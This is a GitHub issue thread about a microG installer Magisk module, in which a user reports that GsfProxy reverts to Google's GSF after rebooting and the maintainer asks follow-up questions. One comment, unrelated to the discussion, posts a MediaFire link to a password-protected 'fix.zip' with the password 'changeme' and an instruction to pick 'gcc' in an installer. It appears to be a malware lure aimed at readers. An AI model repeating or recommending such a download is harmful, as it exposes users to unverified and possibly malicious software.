### ISSUE TITLE
GsfProxy Disappears after reebot

### ISSUE THREAD

**Issue by zongaaaa** [nift4/microg_installer_revived#158]
Hello, so I've been using this module for a while now but I noticed that, after the first reboot when installing the module, if I reboot my phone again the gsfproxy app dissapears/is reverted to the original google gsf. 
Microg services and companion stay and work fine, but gsfproxy doesn't. After checking the zip and the installation messages, I've noticed that the module doesn't actually install gsf proxy (or at least I haven't found any code that does). Don't know if this could be the cause of the problem.

I've also noticed that the original GoogleServicesFramework.apk is still in my system_ext folder, even after a fresh installation of the module. I cannot delete or modify this file as the partition says is read only. Maybe this has something to do with it.

Unrelated to this issue, I also saw that if I remove the module and reboot, microg goes away. Does anyone know of a way to do a permanent install? maybe this could help me resolve this issue in another way.

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nift4** [comment]
How did you uninstall them?

**Comment by zongaaaa** [comment]
It seems to have been fixed now! I uninstalled them before with luckypatcher using the magisk module but now it seems to be working. However the other two apps have changed location, microg services and vending are now in data/app instead of /priv-app like microg gsf, is this normal?

**Comment by nift4** [comment]
No it's not, is the microG revived module still active, or did you perhaps debloat them from system again accidentally using Lucky Patcher?

**Comment by nift4** [comment]
stale, lmk if you still have problems
